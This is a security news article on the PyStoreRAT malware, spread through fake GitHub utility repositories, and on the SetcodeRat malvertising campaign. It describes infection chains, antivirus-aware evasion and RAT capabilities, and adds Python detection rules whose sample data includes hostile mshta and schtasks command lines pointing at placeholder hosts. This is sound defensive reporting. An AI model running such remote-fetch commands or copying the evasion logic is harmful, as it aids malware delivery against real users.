Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads

By Viral Trending Content

Cybersecurity researchers are calling attention to a new campaign that’s leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT.

“These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via ‘mshta.exe’,” Morphisec researcher Yonatan Edri said in a report shared with The Hacker News.

PyStoreRAT has been described as a “modular, multi-stage” implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer known as Rhadamanthys as a follow-on payload.

Attack chains involve distributing the malware through Python or JavaScript loader stubs embedded in GitHub repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities that are designed to appeal to analysts and developers.

The earliest signs of the campaign go back to mid-June 2025, with a steady stream of repositories published since then. The tools are promoted on social media platforms such as YouTube and X, and the operators artificially inflate the repositories’ star and fork counts, a technique reminiscent of the Stargazers Ghost Network.

The threat actors behind the campaign publish the repositories from either newly created GitHub accounts or accounts that had lain dormant for months, then stealthily slip in the malicious payload as “maintenance” commits in October and November, after the tools had begun to gain popularity and landed on GitHub’s top trending lists.

In fact, many of the tools did not function as advertised: some only displayed static menus or non-interactive interfaces, while others performed minimal placeholder operations. Their purpose was to lend the repositories a veneer of legitimacy by abusing the trust users place in GitHub and to deceive users into executing the loader stub that initiates the infection chain.

Running the stub triggers the execution of a remote HTML Application (HTA) payload that, in turn, delivers PyStoreRAT. The malware can profile the system, check for administrator privileges, and scan the system for cryptocurrency wallet-related files, specifically those associated with Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.

The loader stub gathers a list of installed antivirus products and checks it for strings matching “Falcon” (a reference to CrowdStrike Falcon) or “Reason” (a reference to Cybereason or ReasonLabs), likely in an attempt to reduce visibility. If either is detected, it launches “mshta.exe” through “cmd.exe”; otherwise, it executes “mshta.exe” directly.

Persistence is achieved through a scheduled task disguised as an NVIDIA app self-update. In the final stage, the malware contacts an external server to fetch commands to execute on the host. Some of the supported commands are listed below –

  • Download and execute EXE payloads, including Rhadamanthys
  • Download and extract ZIP archives
  • Download a malicious DLL and execute it using “rundll32.exe”
  • Fetch raw JavaScript code and execute it dynamically in memory using eval()
  • Download and install MSI packages
  • Spawn a secondary “mshta.exe” process to load additional remote HTA payloads
  • Execute PowerShell commands directly in memory
  • Spread via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files
  • Delete the scheduled task to remove the forensic trail
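
The two behaviours described above, the loader's mshta.exe launch (direct, or via cmd.exe when Falcon/Reason is present) and the NVIDIA-themed scheduled task, can be expressed as detection rules over process-creation telemetry. The following is an added example, not Morphisec's code; the event shape, field names, URL and task name are constructed placeholders.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:  # constructed event shape; field names are assumptions
    image: str             # file name of the new process
    cmdline: str
    parent: str            # file name of the parent process
    grandparent: str = ""  # parent of the parent, if the feed records it
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "node.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def flag_loader(ev):
    """Loader stub: mshta.exe handed a remote URL, started directly by a script
    host or via a cmd.exe that a script host spawned (the Falcon/Reason path)."""
    if ev.image.lower() != "mshta.exe" or not URL_RE.search(ev.cmdline):
        return None
    parent = ev.parent.lower()
    if parent in SCRIPT_HOSTS:
        return "mshta.exe with remote URL spawned directly by a script host"
    if parent == "cmd.exe" and ev.grandparent.lower() in SCRIPT_HOSTS:
        return "mshta.exe with remote URL spawned via cmd.exe from a script host"
    return None

def flag_persistence(ev):
    """Persistence: schtasks /create with an NVIDIA-themed task name whose
    action runs mshta.exe, matching the disguised self-update task."""
    cmd = ev.cmdline.lower()
    if (ev.image.lower() == "schtasks.exe" and "/create" in cmd
            and "nvidia" in cmd and "mshta" in cmd):
        return "NVIDIA-themed scheduled task whose action runs mshta.exe"
    return None

def scan(events):
    hits = []  # (image, reason) for every event that trips a rule
    for ev in events:
        for rule in (flag_loader, flag_persistence):
            reason = rule(ev)
            if reason:
                hits.append((ev.image, reason))
    return hits
# Constructed sample telemetry; the URL and task name are placeholders, not IoCs.
U = "http://example.invalid/u.hta"
SAMPLE = [
    ProcEvent("mshta.exe", f"mshta.exe {U}", "python.exe"),
    ProcEvent("mshta.exe", f"mshta.exe {U}", "cmd.exe", "python.exe"),
    ProcEvent("schtasks.exe", f'schtasks /create /tn "NVIDIA App SelfUpdate" '
              f'/tr "mshta.exe {U}" /sc hourly', "python.exe"),
    ProcEvent("mshta.exe", r"mshta.exe C:\setup\installer.hta", "explorer.exe"),
]
```

The last sample, a local HTA opened from Explorer, is deliberately benign so the rules do not fire on every mshta.exe launch.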

It is currently not known who is behind the operation, but the presence of Russian-language artifacts and coding patterns points to a threat actor likely of Eastern European origin, Morphisec said.

“PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” Edri concluded. “Its use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain.”

The disclosure comes as Chinese security vendor QiAnXin detailed another new remote access trojan (RAT), codenamed SetcodeRat, that has likely been propagated across the country since October 2025 via malvertising lures. Hundreds of computers, including those belonging to governments and enterprises, are said to have been infected within a month.

“The malicious installation package will first verify the region of the victim,” the QiAnXin Threat Intelligence Center said. “If it is not in the Chinese-speaking area, it will automatically exit.”

The malware is disguised as legitimate installers for popular programs such as Google Chrome and proceeds to the next stage only if the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), or Taiwan (Zh-TW). It also terminates if a connection to a Bilibili URL (“api.bilibili[.]com/x/report/click/now”) fails.

In the next stage, an executable named “pnm2png.exe” is launched to sideload “zlib1.dll,” which then decrypts the contents of a file called “qt.conf” and runs it. The decrypted payload is a DLL that embeds the RAT. SetcodeRat can connect either to Telegram or to a conventional command-and-control (C2) server to retrieve instructions and carry out data theft.
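
The sideload step above, a legitimate-looking executable loading a well-known DLL name from its own directory rather than a system path, is one of the more reliable places to detect this chain. The following rule over image-load events is an added example, not QiAnXin's code; the event format and file paths are constructed.

```python
import ntpath

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
WATCHED_DLLS = {"zlib1.dll"}  # name abused here; extend with other commonly sideloaded DLL names

def is_sideload(image_path, dll_path):
    """True when a watched DLL is loaded from outside the system directories and
    sits in the same directory as the executable that loaded it."""
    if ntpath.basename(dll_path).lower() not in WATCHED_DLLS:
        return False
    dll_dir = ntpath.dirname(dll_path).lower()
    if dll_dir in SYSTEM_DIRS:
        return False
    return dll_dir == ntpath.dirname(image_path).lower()

def scan_loads(events):
    """events: (loading executable path, loaded DLL path) pairs; returns the suspect ones."""
    return [(img, dll) for img, dll in events if is_sideload(img, dll)]

# Constructed image-load samples; the paths are placeholders, not indicators from the report.
SAMPLE_LOADS = [
    (r"C:\Users\u\AppData\Local\Temp\pnm2png.exe", r"C:\Users\u\AppData\Local\Temp\zlib1.dll"),
    (r"C:\Program Files\Tool\tool.exe", r"C:\Program Files\Tool\other.dll"),
    (r"C:\Program Files\Tool\tool.exe", r"C:\Program Files\Common\zlib1.dll"),
]
```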

The RAT can take screenshots, log keystrokes, read and set folders, start processes, run “cmd.exe,” set up socket connections, collect system and network connection information, and update itself to a new version.
